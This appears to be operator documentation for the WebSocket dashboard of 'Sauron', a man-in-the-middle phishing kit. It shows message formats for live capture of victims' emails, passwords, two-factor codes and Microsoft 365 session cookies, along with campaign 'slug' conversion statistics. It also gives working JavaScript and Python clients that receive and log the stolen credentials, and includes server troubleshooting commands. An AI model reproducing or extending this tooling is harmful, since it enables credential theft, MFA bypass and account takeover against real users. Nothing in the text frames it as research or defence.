The WebSocket dashboard provides real-time monitoring of your Sauron MITM operations. Connect to receive live updates on credential captures, visitor activity, and system status.
Live credential captures and visitor tracking
Slug statistics and conversion metrics
Admin key authentication required
// Open the dashboard WebSocket; 'your-domain.com' is a placeholder host.
const ws = new WebSocket('wss://your-domain.com/ws');
// As soon as the socket is open, send a single 'auth' message.
ws.onopen = function() {
  ws.send(JSON.stringify({
    type: 'auth',
    // Authentication handled via Firestore headers
    // NOTE(review): this message carries no key and no header is set anywhere
    // in this snippet, while the protocol notes on this page say the admin key
    // is sent in the authentication message and both client classes further
    // down send an `admin_key` field. The two descriptions disagree; confirm
    // against the server.
  }));
};
// Decode every incoming message as JSON and log the resulting object as-is.
// NOTE(review): JSON.parse throws on a payload that is not valid JSON and
// nothing here catches it.
ws.onmessage = function(event) {
  const data = JSON.parse(event.data);
  console.log('Received:', data);
};
Endpoint: wss://your-domain.com/ws
Authentication: Send admin key immediately after connection
Establish WebSocket connection to /ws endpoint
Send admin key in authentication message
Server confirms authentication and begins sending updates
Real-time notification when credentials are captured
{
"type": "credential_capture",
"timestamp": "2024-01-15T10:30:45Z",
"data": {
"slug": "sales-q1",
"email": "user@company.com",
"password": "captured_password",
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...",
"ip": "192.168.1.100",
"location": {
"country": "United States",
"region": "California",
"city": "San Francisco"
}
}
}
Notification when two-factor authentication tokens are captured
{
"type": "2fa_capture",
"timestamp": "2024-01-15T10:32:15Z",
"data": {
"slug": "sales-q1",
"token": "123456",
"method": "authenticator_app",
"hostname": "login.microsoftonline.com",
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."
}
}
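Full cookie capture from authenticated sessions. The cookies in the example (`ESTSAUTH`, `ESTSAUTHPERSISTENT`) are session cookies for `login.microsoftonline.com`, i.e. state that exists only after sign-in has completed.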
{
"type": "cookie_dump",
"timestamp": "2024-01-15T10:33:30Z",
"data": {
"slug": "sales-q1",
"email": "user@company.com",
"cookies": "ESTSAUTH=...; ESTSAUTHPERSISTENT=...",
"hostname": "login.microsoftonline.com",
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."
}
}
Track user navigation and behavior
{
"type": "session_event",
"timestamp": "2024-01-15T10:31:00Z",
"data": {
"slug": "sales-q1",
"url": "https://login.microsoftonline.com/common/oauth2/authorize",
"pathname": "/common/oauth2/authorize",
"hostname": "login.microsoftonline.com",
"title": "Sign in to your account",
"referrer": "",
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."
}
}
Real-time statistics updates for slug performance
{
"type": "slug_stats",
"timestamp": "2024-01-15T10:35:00Z",
"data": {
"slug": "sales-q1",
"stats": {
"visits": 157,
"logs": 92,
"valid": 25,
"invalid": 13
}
}
}
The WebSocket interface allows real-time slug management and monitoring.
// Send slug creation request.
// Both calls below use `ws`, the socket opened in the connection example;
// the `slug` and `user_id` values are placeholders.
ws.send(JSON.stringify({
  type: 'create_slug',
  data: {
    slug: 'new-operation-2024',
    user_id: 'your_user_id'
  }
}));
// Request statistics for specific slug.
// NOTE(review): the reply format is not shown next to this request; presumably
// it is the `slug_stats` message documented above. Confirm against the server.
ws.send(JSON.stringify({
  type: 'get_stats',
  data: {
    slug: 'sales-q1'
  }
}));
class SauronDashboard {
constructor(domain, adminKey) {
this.ws = new WebSocket(`wss://${domain}/ws`);
this.adminKey = adminKey;
this.setupEventHandlers();
}
setupEventHandlers() {
this.ws.onopen = () => {
console.log('Connected to Sauron dashboard');
this.authenticate();
};
this.ws.onmessage = (event) => {
const data = JSON.parse(event.data);
this.handleMessage(data);
};
this.ws.onerror = (error) => {
console.error('WebSocket error:', error);
};
}
authenticate() {
this.ws.send(JSON.stringify({
type: 'auth',
admin_key: this.adminKey
}));
}
handleMessage(data) {
switch(data.type) {
case 'credential_capture':
this.onCredentialCapture(data.data);
break;
case 'slug_stats':
this.updateSlugStats(data.data);
break;
case '2fa_capture':
this.on2FACapture(data.data);
break;
case 'cookie_dump':
this.onCookieDump(data.data);
break;
}
}
onCredentialCapture(data) {
console.log('New credential captured:', data);
// Update dashboard UI
this.showNotification(`New credential: ${data.email}`);
this.updateCaptureCounter();
}
updateSlugStats(data) {
console.log('Stats update for slug:', data.slug, data.stats);
// Update statistics display
}
}
// Usage: both arguments are placeholders. Constructing the object opens the
// socket, and the key is sent as soon as the connection is established.
const dashboard = new SauronDashboard('your-domain.com', 'your_admin_key');
import asyncio
import websockets
import json
class SauronMonitor:
    """Asyncio client for the dashboard WebSocket at ``wss://<domain>/ws``.

    Sends the admin key in an ``auth`` message right after connecting, then
    passes every message received on the socket to ``handle_message``.
    """

    def __init__(self, domain, admin_key):
        """Store the host name and admin key and build the ``wss://`` URI.

        No connection is made here; that happens in ``connect``.
        """
        self.domain = domain
        self.admin_key = admin_key
        self.uri = f"wss://{domain}/ws"

    async def connect(self):
        """Open the socket, authenticate, and process messages as they arrive.

        The coroutine returns only after the ``async for`` loop over the socket
        ends. The server's reply to the ``auth`` message is not checked
        separately; it is handled like any other incoming message.
        """
        async with websockets.connect(self.uri) as websocket:
            # Authenticate: the key travels as a field of the JSON body.
            auth_msg = {
                "type": "auth",
                "admin_key": self.admin_key
            }
            await websocket.send(json.dumps(auth_msg))
            # Listen for messages. json.loads raises on a payload that is not
            # valid JSON, and nothing here catches that.
            async for message in websocket:
                data = json.loads(message)
                await self.handle_message(data)

    async def handle_message(self, data):
        """Act on one decoded message according to its ``type`` field.

        Three types are handled. ``cookie_dump``, ``session_event``, and any
        other or missing type match no branch and are ignored. The handled
        branches index ``data['data']`` directly, so a message without the
        expected keys raises ``KeyError``.
        """
        msg_type = data.get('type')
        if msg_type == 'credential_capture':
            # Only the email is printed; the full payload goes to log_credential.
            print(f"🎯 Credential captured: {data['data']['email']}")
            await self.log_credential(data['data'])
        elif msg_type == 'slug_stats':
            print(f"📊 Stats update: {data['data']}")
        elif msg_type == '2fa_capture':
            # The token value itself is written to standard output.
            print(f"🔐 2FA token captured: {data['data']['token']}")

    async def log_credential(self, credential_data):
        """Placeholder hook: receives the capture payload and does nothing."""
        # Save to database, send alerts, etc.
        pass
# Usage: both arguments are placeholders. asyncio.run() blocks until connect()
# returns, which is when its receive loop ends.
monitor = SauronMonitor('your-domain.com', 'your_admin_key')
asyncio.run(monitor.connect())
Check that Sauron is running and that the WebSocket endpoint is accessible
sudo systemctl status sauron
Verify admin key is correct and matches server configuration
grep ADMIN_KEY .env
Ensure authentication was successful and slugs are active
Check WebSocket authentication response
Verify SSL certificate is valid for WebSocket connections
openssl s_client -connect domain:443